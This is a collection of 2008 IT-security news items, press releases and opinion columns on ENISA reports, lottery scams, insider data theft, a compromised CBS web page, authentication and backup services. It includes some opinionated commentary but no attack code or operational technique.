As administrators are, fortunately, just ordinary people, even they can make mistakes. A well-designed user interface can help prevent many mistakes which can easily occur. One typical area, for instance, is when checking the details input in screen forms. A MAC address must only comprise quite specific characters, therefore making it easy to check. It should not be possible to activate configurations where mistakes in the content have been recognised. The number one method for checking input is to carry out a comprehensive consistency check where a major part of the configuration is checked for its consistency. A good example in this case is checking the consistency of a gateway’s complete network configuration. This will prevent administrators from shooting themselves in the foot as a result of changes made. Another example of what is potentially a very complex configuration is a rule tester for firewall rules, which indicates what effect scheduled changes have on important connections.

In 2008 administrators must expect to use tools such as drag-and-drop to speed up input and make it more attractive. Configuration tasks involving several systems, which are renowned for being unpleasant and prone to errors, can be simplified dramatically by combining the use of configuration templates with a graphical editor. For instance, this tool makes it possible to draw the desired VPN tunnel topology simply using the mouse.

One feature which is very valuable in multi-administrator environments is integrated version control, which is based, for instance, on the tried-and-tested Revision Control System (RCS). This makes it possible to establish which administrator has changed what, when and from where. The scope of application here is versatile. Firstly, it is very easy to make changes retrospectively. Secondly, this type of system can be used to quickly roll back the configuration to an older version in order to be able to calmly analyse the side effects that may have suddenly arisen as a result of a complicated change. The key point is that this kind of function is fully integrated in the interface and that the authentication system provides for the appropriate roles.

<>

Broken Sandisk Cruzer Enterprise

by Michael Smith

A lot of people seem to have problems what they perceive to be with the Sandisk Cruzer and the Cruzer Enterprise device.

It will appear to them that it is not being recognized by their computer and a message gets thrown up that says something like “Cruzer Enterprise requires 2 drive letters...”

I have the same problem with my XP Pro machine and have also assumed that this is a problem with the device, i.e. that it has failed for some reason and is broken.

The failure does not lie, however, with the Sandisk Cruzer device – and once again my apologies to the folks at Sandisk for having assumed them to be at fault though they could have used the opportunity to inform readers of what the real issue is but did not – but with the user's computer.

Yes, folks, honestly. It is Windows that is at fault, and here especially XP. But on its own XP would be fine. The problem is that there is a patch that came “down” in (automatic) Windows Update some time ago originally – in my personal case around April 2008 – and this patch cannot be removed.

Microsoft has released a hotfix fore this some time back but there is one problem with that. In most case the hotfix fixes nothing.

I have applied the fix and exactly – no change. However, on my Fujitsu Siemens laptop with Vista the Cruzer stick works fine, as does the Kingston Data Traveler Black Box. That does not work on my XP Pro PC either. On the other hand the Blockmaster Safestick and the MXI devices all work fin on that PC.

It would appear that this patch only knocks out some of the .exe programs that are used for automatic data encryption by some manufacturers.

So, to quickly sum it up, folks: It is not your Sandisk Cruzer stick that is broken; there is a problem on your Windows operating system. Unfortunately, the hotfix does not fix things so maybe someone needs to hit the guys in Redmond on the head with something.

This was the final straw that made me ultimately turn off Windows Updates. So far I have had more grief with that than anything and I am rather fed up with having to spend ages having to sort out the mess that has been created by such updates. On of the other instances was when a patch disabled Zonealarm firewall and that for thousands of users. Well done, Microsoft!

Once again, folks. The fault lies with the patches from Microsoft for Windows OS rather than with the device(s). Anyone feeling strongly enough about this could always send a nicely worded message to Microsoft's good offices. Maybe they then wake up to the fact that it is not funny being on the receiving end for users of patches that screw things up.

On the other hand, any more screw ups like this might finally get the message across to the makers that they must make their sticks also compatible with Linux and other Open Source operating systems and it may also get the message across to PC users that there are other alternatives to Windows, namely Linux, BSD and other Open Source programs. You do not have to run Windows, generally.

© M Smith (Veshengro), December 2008
<>

Virtual Worlds - Real Money. Multiplayer online gamers 'soft target' for cybercriminals - EU Agency report warns.

Serious real-world money locked up in the 1.5 Bn Eur virtual goods market is leading to a wave of malware threatening ca 1 Bn users worldwide. The EU Agency's report includes 12 recommendations for governments, game providers and users.

Online gaming fraud is an increasingly serious threat - according to a new ENISA report. The failure to recognise the importance of protecting real-money value locked up in this grey-zone of the economy has lead to a 'year of online-world fraud'. A survey in the report shows that 30% of users have recently lost some form of virtual property through fraud. In less than a year, more than 30,000 new malicious programs have been detected specifically targeting accounts and property in online games and virtual worlds - "this is a jump of 145%", says Kaspersky labs.

Such malware is invariably aimed at the theft of virtual property accumulated in a user's account and its sale for real money. "While annual real-money sales of virtual goods is estimated at nearly 1.5 Bn Euro worldwide, users can do very little if their virtual property is stolen. They are a very soft target for cybercriminals," says Giles Hogben, editor of the report put together by a group of industry, academic and government experts. "There are 1 Bn registered players of online games worldwide and the malware targeting them affects everyone with a computer connected to the internet."

Privacy and personal data, Another important area is the misuse of personal data. The survey of 1.500 respondents in the UK, Sweden and Germany shows that most people think their avatar cannot reveal anything about their real identity. But an avatar is no different from using any online persona, particularly in so-called "social worlds", i.e. hybrids between online games and social networks. "People should take just as much care of their personal data in these environments as in any other online context," says Mr. Andrea Pirotti, Executive Director of the Agency. Bots can be sprinkled within virtual worlds to spread spam or advertise products, for example, and these sites are vulnerable to novel variants of denial of service attacks. "Multiplayer online games are especially vulnerable to denial of service attacks because of their centralized architecture and poorly authenticated clients," the report says. The report identifies 12 recommendations to tackle these problems, e.g.;

- An industry-wide forum for service providers to share best-practice on security vulnerabilities
- Clarification of virtual property rights for more adequate theft protection
- A checklist of key technical issues for service providers/developers
- Awareness-raising campaigns for users eg., on child-safety and privacy risks.

For full report and survey see: http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp_security_privacy_virtualworlds.pdf

Source: ENISA
<>

How do 23 countries in Europe strengthen the resilience of public communication networks? EU Agency presents the first EU-wide survey on policies and

The EU Agency ENISA presents its first ever EU wide report on "Stock Taking of Regulatory and Policy Issues related to Resilience of public eCommunications Networks"

In October 2008 ENISA released the first ever comprehensive European report which presents 23 different national regulatory and policy strategies that are being used to facilitate, support and strengthen efforts to improve dependability and resilience of public eCommunications Networks.

In summary, the report identified that there is a significant variety in the deployed strategies, policies, initiatives and regulatory provisions across the EU. Despite these differences, certain preliminary strategy commonalities across Europe for increasing resilience can be highlighted:

- Development of a national strategy, a solid policy and/or regulatory environment and concrete preparedness measures; define clear roles and responsibilities of public agencies; encourage intra- agency and information sharing,
- Encouragement of voluntary collaboration between public and private stakeholders. Capitalising on the know-how of experts from both industry and public authorities to support the development of best practices and guidelines.
- Focus on how well things are working in practice (e.g. exercises, audits, onsite visits, etc.)
- Prompt reaction on reported incidents and their analysis within a trusted group of experts from public and private sector stakeholders
- Multiple, frequently performed small steps have proved to be more effective than big national initiatives. This holds true for current and in future e-resilience issues.

This study is done in the context of ENISA's multi annual thematic program on Resilience of public communication networks. It focuses on giving an accurate picture of each country's policies, initiatives, and regulations. Institutional stakeholders could use this inventory of policies and strategies to identify common approaches, confirm the appropriateness of their measures and activities, and to become inspired by the initiatives of other countries.

The Executive Director of ENISA, Mr. Andrea Pirotti remarked: "This work underpins Member States authorities' efforts to debate and co-operate on this issue in a structured manner. We will continue serving this constituency with the full analysis of the stock taking findings."

The analysis of the stock taking results is due to be published by ca mid January, 2009, after the workshop that has taken place in Brussels on 12-13th of November.

For those who do not, as yet, know, the European Network and Information Security Agency (ENISA) is an agency of the European Union. ENISA was created in 2004 by EU Regulation No 460/2004 and is fully operational since September 1st, 2005. It has its seat in Heraklion, Crete (Greece). The objective of ENISA is to improve network and information security in the European Union. The agency has to contribute to the development of a culture of network and information security for the benefit of the citizens, consumers, enterprises and public sector organisations of the European Union, and consequently will contribute to the smooth functioning of the EU Internal Market. ENISA assists the Commission, the Member States and, consequently, the business community in meeting the requirements of network and information security, including present and future Community legislation. ENISA ultimately strives to serve as a centre of expertise for both Member States and EU Institutions to seek advice on matters related to network and information security.

Source: ENISA
<>

Coalition attempts a crackdown on lottery spammers

by Michael Smith

What generally increases when the overall economy declines? That’s right – crime. And these days, when you receive an email that proclaims that you’ve won the “Yahoo! Lottery,” the financially-pressured optimist in you might be more inclined to bite the bait.

Let's face it. If you have not actually entered a lottery of any sorts then the chances that you are a winner are very, very slim indeed, In fact they are nil. Period!

Last May, Yahoo filed a lawsuit against “Yahoo! Lottery” spammers who use the Yahoo brand to trick unsuspecting users into handing over personal data to claim a prize. While progress is being made on catching those scammers, there is concern that they may step up efforts to dupe people impacted by these tough times.

Aside from those scams which, in my opinion, should be easy to spot (see my message above), there are those message that purport to some from one's bank or building society, requesting one update this or that or whatever. Banks will not, in general, ever use the email channel for such communications and therefore the user can be assured that 99.99% of any such messages are not from the user's bank.

I have gotten emails from the United Farmers Bank, for instance, and, seeing that I am in the UK it is hardly possible for me to be a customer of this bank from the Midwest, so I believe, in the USA.

Recently Yahoo announced a public-private coalition with Microsoft, the African Development Bank, and Western Union to allow victims of lottery scams to upload police reports that Yahoo (and other such services) can use with the goal of tracking down these devious criminals and developing better ways of protecting people online. INTERPOL has gotten involved to inform international law enforcement agencies about the initiative and provide guidance on critical information to collect to identify trends and common patterns.

Yahoo! and the other coalition members have set up dedicated email addresses and Web sites (Yahoo's website for this is: http://antispam.yahoo.com/phishingtips) where lottery scam victims – those who took the bait and handed over personal information – can share details of the police report they have filed. These reports may be helpful to other coalition members and law enforcement in fighting lottery scammers.

For readers who spot a scam but don’t fall for it, Yahoo has tips as well. First off, don’t ever reply to the message, even as a joke. Some people do and have done but... Firstly you do not want to be encouraging those people – if one can call them people. Instead, if a Yahoo mail user, click the “Spam” button, which helps Yahoo and their anti-spam systems block these types of messages and kick these criminals off the Internet. In addition to that replying to any such message, even in jest, identifies to the “spammers” that yours is an active email account and instead of stopping they will increase their activity, targeting your account.

A little reminder, if it be needed: no one ever wins the Yahoo! Lottery. The reason for this is simple. There simply is no Yahoo! Lottery. The same holds true for any MSN Lottery and any such.

As I have said above: if you have not actually directly entered a lottery or sweepstake, then the chances for a win are simply nil.

You may also rest assured that you are not the beneficiary of some millions that some aunt you never knew you had or some Nigerian woman who died has bequeathed to you. Also, if that be the case, why would the supposed lawyer request details such as your name, address, sex, etc. that, if you really are the beneficiary, he should already know. Also, you can rest assured that no legal officer uses emails for such kind of business. Why not? Because email is not considered a secure means of operating.

While the economy may be down, still be wary of any unexpected lottery win or the approach by anyone who offers you millions that he has found lying about somewhere unclaimed in an account or such.

Let's enjoy the benefits of the Net but let's also be aware that there are dangers out there. Do not make yourself a victim.

© M Smith (Veshengro), November 2008
<>

THE KEY REVOLUTION LTD ANNOUNCE CHANNEL DEAL WITH INSIGHT

Insight announced as TKR’s first reseller focusing on SME and Public Sector clients

The Key Revolution (TKR), developers of the portable office and secure virtual network solution, Mobiu, have today announced a reseller partnership with Insight Direct (UK) Ltd that will allow distribution of Mobiu into the heart of the UK market. Insight will be selling one-year Mobiu subscription licenses direct to their business customers.

Insight’s customer base is aligned with TKR’s continued horizontal targeting of professional SMEs, with a core market focusing on SMEs with up to 250 employees; with additional sales to prosumers and local government also possible. The deal is now live with Peak as the partner distributor.

Paul Bolt, Marketing & Partner Management Director at Insight comments, “Many of our customers have been asking us for a technology solution that will allow mobile working, without compromising security and that will be easy to use at a reasonable price. In Mobiu, we feel we have selected a best-of-breed product with a sophisticated level of security but at an affordable price, which is critical when spend analysis is as crucial as it is today”.

Adrian Burholt, CEO of The Key Revolution comments, “Insight has enormous reach into the small business market which makes them a natural partner for us. We’re looking forward to working directly with them to help drive demand for the Mobiu product.”

The Mobiu secure virtual network solution offers mobile computing to small/medium businesses and consumers. Mobiu is an advanced USB based device with a SIM card that plugs into a computer and enables the user to automatically store and back up the latest versions of all documents in designated file locations. Mobiu can then securely unlock, access and use all files, data and applications safely, securely, and privately, from any online PC running Windows XP or Vista, in any location. Services included with Mobiu are:

· Plug and play ability
· SIMAssured chip and pin access system
· Web-browsing without leaving a ‘footprint’
· File and folder back-up across multiple PCs direct to MobiVault secure server hosted by NTT Europe Online and powered by Sun Microsystems
· Shared MobiRoom private workspaces that can be set up simply and easily where colleagues and friends can be invited to join and share information
· Remote ‘kill’ feature to disable the Mobiu if the owner reports it as lost/stolen

Mobiu provides 5 gigabytes of file storage and is fully compatible with Windows XP and Vista operating systems. Mobiu uses patented technology in its SIMAssured Technology Platform to provide a secure central gateway.

Pricing: SRP £150 including VAT

The Key Revolution was created by a team of ex-Vodafone employees to license and commercialise technology patented by Vodafone. This technology enables Internet users to securely authenticate themselves and encrypt their data using the SIM (Subscriber Identity Module) - familiar to billions of mobile phone users worldwide. The Key Revolution was licensed to use the technology in September 2007 in return for an early equity stake. The first product from The Key Revolution based on its SIMAssured™ technology platform is Mobiu, a portable office solution which uses a unique SIM enabled solution to access files and applications securely from any online PC running Windows XP or Vista.

For more information, please visit www.thekeyrevolution.com

Insight Direct (UK) Ltd., based in Sheffield, is a wholly owned subsidiary of Insight Enterprises, Inc. (“Insight”). Insight is a leading provider of brand-name information technology ("IT") hardware, software and services to large enterprises, small- to medium-sized businesses and public sector institutions in North America, Europe, the Middle East, Africa and Asia-Pacific. The Company has more than 5,300 teammates worldwide and generated sales of $4.8 billion for its most recent fiscal year, which ended December 31, 2007. Insight is ranked number 477 on Fortune magazine's 2008 "Fortune 500" list.

www.insight.com

Source: Clarke Mulder Purdie
<>

Transatlantic Survey Shows Nervous workers offer to double their hours and reduce their salaries to secure employment

London, December 2008 - It would seem desperate times call for desperate measures as a survey released today shows that workers will do almost anything to keep their jobs – but at a cost to the employer!! The survey, into “The Global Recession and its Effect on Work Ethics”, carried out by IT security data experts Cyber-Ark, found that more than one third of the 600 office workers (from New York’s Wall Street, London’s Canary Wharf and Amsterdam, Holland), confirmed they would be willing to work 80 hours a week, with 25% prepared to take a salary cut, if it meant they could keep their jobs. Nevertheless, these workers are conspiring behind their bosses’ backs to download vital, useful and competitive information to take with them if and when they get the push!

Interestingly, 56% of workers surveyed admitted to being worried about losing their jobs. Alarmingly, in preparation, more than half have already downloaded competitive corporate data and plan to use the information as a negotiating tool to secure their next post: 71% of workers in Holland confessed to having already downloaded data, 58% in the US and just 40% in the UK. When confronted with the prospect of being fired tomorrow and ethics go out the door (so to speak), 71% surveyed declared they would definitely take company data with them to their next employer. Top of the list of desirable information is the customer and contact databases, with plans and proposals, product information, and access / password codes all proving popular choices. HR records and legal documents were the least most favoured data that employees were interested in taking.

Redundancy is a sore word and rumours that they were looming would send 46% of the global workers interviewed scurrying about trying to obtain the redundancy list. Half said they’d try using their access rights to snoop around the network and, if this failed, they’d consider bribing a ‘mate’ in the IT department to do it for them.

Adam Bosnian, VP of Products, Strategy and Sales of Cyber-Ark says, “Employers have a right to expect loyalty from their workforce, however this works both ways and in these dark days, everyone is jittery especially with lay offs at the top of most corporate agendas - the instinct is to look out for number one. It would be unthinkable to leave money on a desk, an obvious temptation to anyone passing, instead it is always safely locked away and its time sensitive information is given the same consideration. If times get hard, and they invariably will, companies need to ensure that any cutbacks aren’t deeper then expected when stolen data unexpectedly eradicates any chance of survival – our advice is only allow access to sensitive information to those that really need it, lock it away in a digital vault and encrypt the really sensitive data.”

Surprisingly companies do seem to be heeding the danger that data leakage poses. The study reveals workers globally believe it’s becoming harder to take sensitive information out of the company – 71% in the UK acknowledged it was difficult and 46% in Holland agreed. Yet in the US the message still isn’t getting through with only 38% admitting they had found it difficult to sneak information away.

Memory sticks are the smallest, easiest, cheapest and least traceable method of downloading huge amounts of data, which is why this is often considered the “weapon of choice”. Other methods were photocopying, emailing, CDs, online encrypted storage websites, smartphones, DVDs, cameras, SKYPE, iPods and, rather randomly yet quite disconcerting, in the UK 7% said they’d memorise the important data!

Additionally, the study discloses that universally we’re not all as equally conscientious and prepared to work all the hours available. 50% of US workers were prepared to work that much harder compared to 37% in Holland and just 27% in the UK in favour of an 80 hour week. Additionally, when asked what other lengths they would go to in order to keep their jobs, the data wasn’t just limited to the hours employees were willing to put in. For the US there were no boundaries with 15% admitting they’d consider blackmailing the boss and 26% prepared to buy the next round of drinks for a year! The Brits and Dutch were less dishonest with just 3% contemplating bribery, and only 6% in Holland and 2% in the UK willing to buy the drinks.

“The damage that insiders can do should not be underestimated. With a faltering economy resulting in increased jobs cuts, deferred promotions and additional stress, companies need to be especially vigilant about protecting their most sensitive data against nervous or disgruntled employees,” adds Bosnian.

What many managers and business owners do not seem to appreciate and understand it that a disgruntled employee or one that is being made redundant does not need a suitcase and access to the photocopier for a day or so in order to steal vital information. All he or she needs is a USB flash drive with a couple of gigabyte and access to your computers and Bob's your Uncle.

The damage that can be done in this way is enormous and is nothing compared to the sales rep who was made redundant who takes all his client and contact list with him to the new firm and gets a cushy number because of that.

Material removed in this way can inflict rather serious damage to any business if someone would want to release it. On the other hand such knowledge could be vital to a competitor who may hire that former employee.

While it may nor be a good idea to ban the use of USB sticks and other flash media throughout the enterprise, like it was done by the US DoD because of a cyber attack (which would hardly be launched from the inside via such drives though this could be done), a policy of who can and who cannot transfer files and which files should be put in place. This is especially true in the current climate.

The survey into “the global recession and its effect on work ethics”, was carried out by Cyber-Ark’s team of researchers amongst 600 office workers on Wall Street, New York, Canary Wharf London and at an International event in Amsterdam Holland.

Yvonne Eskenzi/Eskenzi PR & Michael Smith, ICT Review
<>

India apportions part-blame for terror attacks to modern technology

by Michael Smith

After the horrific attacks by terrorists on hotels and other targets in the city of Mumbai (Bombay), India, on November 26, 2008, the hysterical online press tried to partially blame modern technology for the fact that the attacks were made possible.

It is, apparently, the fault of the GPS systems and satellite telephones that it was possible for the terrorists to attack those targets in Mumbai with impunity. Doh?

I mean ,folks, let's be serious, this is like claiming the knife jumped out of its sheath and attacked the person that was stabbed, for instance. Help!

A few days after the attacks various online media outlets knew immediately why it was at all possible for the terrorists to attack. On board of the ship that the terrorists may have used – nothing certain as yet on that – to come to India GPS maps and a satellite telephone have been found and it, therefore, obvious that modern technology must shoulder a large part of the blame for this attack having become possible. Wow!

And, in addition to that the email system is also at fault for it made it possible for the "Deccan Mujahideen" after the attacks to send messages to all the news agencies claiming responsibility. It is being claimed that the emails could be traced back to have originated in Russia,. Oh dear. Now there is Russian involvement there as well, is there?

Obviously, had modern technology not existed those attacks would not have happened. That, at least, appears to be some of the reasoning of those so-called journalists.

On the other hand, there are some that put even different angles on this tragic events but...

Some security officials apparently have said that the use of emails by terrorists is by now so common and widespread for them to use this medium to be able to spread their poison far and wide across the globe. I guess that the powers that be will – next – try to stop us using emails or they will claim that they must be able to have the rights to snoop on our email traffic (not that they are not doing this already).

In addition some of the same experts have said that the situation appears that that terrorists can use, without any problems and restrictions, use satellite phone or a Micro-Blogging System as aids for his terrorist activities. So, the experts say, we must now look at how to keep those high-tech tools out of the hands of terrorists. Oh dear!

Now how do they think that is going to be feasible? Only if they make the use of emails and such illegal or by monitoring all the emails that you and I, who are not terrorists, send across the world, whether for business or other reasons. In addition to that, I am certain, they would like to censor all Blogs and Bloggers. That would suit the authorities anyway, would it not.

We only need to look with regards to Blogging to Italy where the courts have, basically, ruled that Blogging is illegal, and that Bloggers require a government permit.

© M Smith (Veshengro), December 2008
<>

Versatile authentication: the next logical step for the financial services sector

By Philip Hoyer, technical architect, ActivIdentity EMEA

It may already be a cliché, but the credit crunch is forcing all types of businesses to review their costs and look at how they can reduce overheads. For financial institutions with millions of customers, one of the most obvious solutions is to encourage those customers towards using low-cost channels, such as the internet, to manage their accounts rather than going to branches or through call centres which have to be staffed.

But the internet brings significant security risks, and banks must be able to guarantee that a customer is who they say they are in the face of increasingly sophisticated fraud attempts by cyber-criminals who have developed new ways of accessing sensitive information with alarming speed. Clearly, banks must deploy much more than password-based systems in order to encourage more customers to use online facilities and to protect existing internet customers from fraud.

Both Barclays and Natwest have recently announced that they are issuing card readers to customers, indicating the start of a trend towards using strong authentication for all customers, not just businesses or high net worth individuals.

The problem comes with integrating these new technologies into an existing infrastructure. Most banks are already managing a legacy that is comprised of various point solutions that are used to help customers access their accounts via different channels using different technologies. One customer might require a password to use the telephone banking service, and a memorable question for resets or emergency access; another might use a token based on proprietary or OATH technology to access online banking. Similarly, the same institution may, in the future, want to introduce PKI or biometric data to further improve the security of transactions.

Traditionally banks and other financial services firms have built up a collection of point security solutions that are difficult to manage and incredibly costly to maintain. Firms are beginning to realise that there is a need to consolidate varying authentication systems into one single infrastructure that can support different types of credentials, from cards to tokens and interactive voice response technology. Gartner has coined the term “versatile authentication” to describe a platform used to manage all credentials.

A good versatile authentication platform will be based on open standards, so that it can be used as a system “backbone” to manage multiple authentication systems from different providers to maximise investment in pre-existing authentication technologies. This will also enable new authentication methods that may be required in future. This reduces operational and infrastructure costs, and will ultimately reduce the total cost of ownership.

The benefits of versatile authentication are numerous, despite concerns over the impact of introducing new technologies on the user experience. Customers are more likely to put their trust in online financial transactions if they perceive them to be more secure, which will bolster the adoption of low-cost service channels. They will also benefit from a consistent authentication experience across all channels – using their EMV card to access their account via the internet, call centre or branch.

In turn, the bank will benefit from the highest possible levels of security and flexibility, combined with lower costs and the ability to upgrade authentication levels to meet market needs.

The concept of versatile authentication also fits neatly with the trend towards a service oriented architecture which will improve the user experience in the long run. If a customer loses their EMV card, one single command within a versatile authentication platform should be able to disable the device – regardless of what technology it is based upon and the channel through which the customer reported the card missing – thereby cutting down the amount of time spent by staff to resolve the problem.

It’s the next logical step for financial services organisations that want to be ahead of the game, and should demonstrate a fast return on investment in the face of impending recession.

ActivIdentity EMEA is exhibiting at Infosecurity Europe 2009, Europe’s number one dedicated Information security event. Now in its 14th year, the show continues to provide an unrivalled education programme, the most diverse range of new products & services from over 300 exhibitors and 12,000 visitors from every segment of the industry. Held on the 28th – 30th April 2009 in Earls Court, London this is a must attend event for all professionals involved in Information Security.

www.infosec.co.uk

Source: Infosecurity PR
<>

Finjan Warns Users Over CBS Portal Being Compromised by Cybercriminals

Farnborough, United Kingdom, November 2008: Finjan, a leader in secure web gateway products, has warned Internet users to be on their guard, following an apparent compromised web page on one of the sub-domains on the CBS.com portal.

“The cybercriminals, who compromised one of the sub-domains under CBS.com, appear to have added a malicious obfuscated script to the infected page. The injected script then dynamically injects an IFrame that pulls malware from a remote server locating in Russia.” said Yuval Ben-Itzhak, Finjan's CTO.

Fortunately for CBS site visitors, Finjan reports actions were already taken to turn that Russian server offline.

Finjan CTO says the company's MCRC - Malicious Code Research Center - has notified CBS of the problem and the team expects the page in question to be taken offline and/or replaced with the original data.

"This saga confirms our many previous warnings that obfuscated code posing a serious threat to Internet users' PCs. Our Threats Reports have continued to identify the increasing use of code obfuscation as a means of bypassing traditional signature-based solutions in order to propagate malware," he said.

"This saga illustrates the popularity of malicious obfuscated code as a weapon of choice by criminal hackers. It also highlights the fact that no Web portal, no matter how high ranking, can be totally secure against a system hack and consequent infection of its visitors. Web users need to exercise caution at all times," he added.

Finjan's security tips and notes to prevent infection:

For businesses:

1. Install a Secure Web Gateway to protect valuable data from being compromised by malware
2. Finjan is offering free Malware Detection Audits to organisations with over 1,000 users
3. Consider the use of a secure platform when accessing Web 2.0 sites

For consumers:

1. Use Finjan's SecureBrowsing browser plug-in to make the right decisions when browsing the Web (see http://securebrowsing.finjan.com )
2. Exercise caution when accessing Web 2.0-enabled sites - e.g. Social Networking portals, wikis and blogs etc.,
3. Do not rely just on signature-based IT security applications

For all users:

1. The preferred way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyse and understand the code embedded within Web content on-the-fly before it reaches the user.
2. Proactive, behaviour-based IT security technology performs in-depth analysis of each and every piece of content, regardless of its original source.
3. This analysis breaks the code into parts, understands the execution path and the functions' call flow.
4. As a result, these solutions can identify code that is about to perform a malicious or suspicious operation, and block it at the perimeter, rather than allowing it to enter the network and relying on desktop security.
5. This type of proactive security is akin to having an 'expert system' in a box,' safeguarding users from even the most devious attack techniques, such as those disclosed in this and previous Finjan reports.

For more on the CBS site infection: http://www.finjan.com/MCRCblog.aspx?EntryId=2103
For more on Finjan: http://www.finjan.com

Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet applications, as well as other popular programs. MCRC’s goal is to stay steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worms and viruses. MCRC shares its research efforts with many of the world’s leading software vendors to help patch their security holes. MCRC is a driving force behind the development of next generation security technologies used in Finjan’s proactive web security solutions. For more information, visit our MCRC subsite.

Finjan is a global provider of web security solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan’s active real-time web security solutions utilize patented behaviour-based technology to repel all types of threats arriving via the web, such as spyware, phishing, Trojans and obfuscated malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan’s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit: www.finjan.com.

Source: Eskenzi PR
<>

Home of the Internet

At the heart of the community
Tŷ Hafan is a children’s hospice that provides care to children with life limiting illnesses. It offers a unique service to families in South Wales and relies on charitable donations to run the service. Tŷ Hafan also organises the biggest hospice lottery in the UK and a large proportion of its operating funds are raised through this lottery.

The lottery data is stored together with confidential children’s records and Tŷ Hafan’s donor database which provides access to valuable information on everyone who has supported Tŷ Hafan, including past and current supporters, how much each person has donated, what they have volunteered for and what their interests are. This database is stored at the Head Office in Cardiff where the Administration team is based. Because nearly all the charity’s funds are raised in-house, it would be impossible for the organisation to function without this crucial information.

Driving IT strategy forward
The hospice could not continue to provide services if it lost details of its donors and lottery subscribers. So Tŷ Hafan needed to remove the possibility of human and mechanical error and improve the robustness of its back-up and restore system. The hospice also needed to be able to safeguard offsite the highly confidential medical records of the children under its care. The back-up and restore process used to take place manually with a member of the administrative staff manually inserting tapes each day. As well as needing to be physically present the manual tape based back-up system was very slow to restore. A technical issue which arose during routine security updates to the server resulted in the tape system failing also highlighted the vulnerability of running the back-up and restore system in-house.

Key requirements: drive forward Tŷ Hafan’s IT strategy and enable the organisation to conduct day-to-day business without worrying about the risk of losing data; guarantee safety and security of children’s records and donor and lottery databases; reduce administration costs and increase amount of money being directly channelled into children’s services; reduce risk of human and technical error by switching to remote Internet based back-up and restore service; remove need to be physically present for backups to take place; improve efficiency of internal IT support for over 100 IT users at twin locations - Headquarters and Hospice.

Safeguarding the future
Previously the system was programmed at certain times of day to back up anything that had changed from the previous day. If no tape was put in, no back up took place. With the Interxion SDS system, the hospice can now rely on a completely automated backup system. At one stage, whilst Tŷ Hafan was running the tape backup system concurrently with SDS, the tape drive ceased to function due to an issue with the software. Fortunately, Interxion’s SDS system was already in place and back-up continued to be carried out automatically, whilst the tape backup system problems were being resolved.

Tŷ Hafan wanted the most advanced technology available to protect valuable records and data and improve efficiency, which helps drive the business forward. It enables its IT Manager, Alex Bruce, to manage the backup remotely across two geographically separate sites and to restore data very quickly at LAN Speed, by using the Local Storage Option, which backs up simultaneously onsite, as well as offsite to Interxion’s two remote Enterprise Class data centres.

Initially, the Secure Data Service (SDS) from Interxion was run using a spare PC, followed shortly by the purchase of stand alone equipment (NAS box) which removes the need for anyone to be there to insert a tape. Alex Bruce, IT Manager, Tŷ Hafan, says: “It’s a nice way to back up data to as you don't need to push any buttons and it does the backups automatically. I can completely forget about the system until I need to use it, for example, if someone calls for help to restore a Word file they’ve accidentally deleted.”

Optimising business performance
The amount of time between when an issue is reported and something needs restoring and when it is actually done, has now been vastly reduced. Instead of taking a key, opening a room and putting in a tape, this can now take place instantly.

“Overall, putting SDS in place means that I can go about the day to day business without having to worry about risk of losing data. The service is always running and backing up, and I receive an email every morning to say it has been successful.

The new Interxion SDS system operates using a standard business broadband connection. The remote system has proved very valuable. It is refreshed and updated instantly. If corruption does occur on one of the databases it’s important for the organisation to be confident that it can get the system back to its last known good state. Interxion gives Tŷ Hafan the confidence that this will happen, should this ever occur.

In order to ensure that all eventualities are covered, a disaster recovery plan procedure has now been put in place which includes all aspects of emergency recovery that would be needed, including Secure Data Service encryption keys, passwords and telephone numbers.

Alex says: “Interxion have been easy to liaise with and deal with all enquiries in a timely manner, with instant responses to emails to their help desk. This was particularly important. As the only person responsible for the IT for the organisation, if there is an issue, I need an instant response. It would be unworkable to log an enquiry and have to wait three hours for an answer as the nature of the job means I will have moved on to deal with other things during that time, leaving the user’s problem unresolved potentially, losing valuable working time.

“I’ve been impressed with the level of service. Interxion staff offer continuous support and were brilliant with regard to solving the technical issues involved in setting up the new SDS system.

“One aspect which was of great assistance was being assigned a personal account manager by Interxion who ensured that everything ran smoothly.

“I would recommend Interxion to other clients without hesitation and to anyone considering other ways of looking at a back-up and restore service,” concludes Alex.

Interxion is a leading European provider of carrier neutral data centres. Headquartered in Schiphol-Rijk, The Netherlands, Interxion serves its customers from 23 carrier-neutral data centres located in 13 cities across 11 European countries. Interxion serves network and carrier-based, hosting and enterprise customers who require professionally managed and strictly controlled physical environments within which to operate mission-critical applications and computer systems. Interxion’s data centres offer cost-effective and fast access to multiple local and global communication networks. For more information please visit www.interxion.com

Source: Spreckley Partners
<>